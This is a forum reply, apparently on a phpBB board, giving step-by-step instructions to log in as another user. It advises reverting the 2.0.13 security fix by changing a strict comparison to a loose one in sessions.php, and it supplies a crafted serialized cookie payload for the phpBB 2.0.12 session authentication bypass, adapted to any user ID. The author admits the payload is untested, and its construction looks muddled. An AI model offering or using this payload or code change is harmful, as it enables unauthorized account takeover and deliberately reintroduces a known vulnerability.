What the hell are you trying to do?
If you just want to log in as him, this is what I would do. Reverse the security update of 2.0.13. So that means going into includes/sessions.php, and doing this:
find
Code:
if( $sessiondata['autologinid'] === $auto_login_key )
replace with
Code:
if( $sessiondata['autologinid'] == $auto_login_key )
A while ago there was a vulnerability in phpBB to bypass authentication bypass.
There's a tutorial on what to do here:
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)
There are a bunch of plugins for FF you can use to easily change your cookies as described in that. Except, when it says to replace the cookie with:
Code:
phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
that is actually the admin id....you'll need to go here:
URL Decoder/Encoder and encode this string (I will refer to it as string1):
Code:
";b:1;s:6:"userid";s:1:"USER'S ID HERE";}
and also this string (I will refer to it as string 2)....
Code:
";s:1:"[USER'S ID HERE]";}
oh yeah, this string too (string 3).
Code:
a:[USER'S ID HERE]:{s:11:"
Then replace what it says in the tutorial with:
Code:
phpbb2mysql_data [YOUR STRING3 HERE]autologinid[YOUR STRING1 HERE]userid[YOUR STRING2 HERE]
Sorry if I confused you, heh. I haven't tested this so I don't guarantee it to work. But it will take 5 minutes, worth a shot.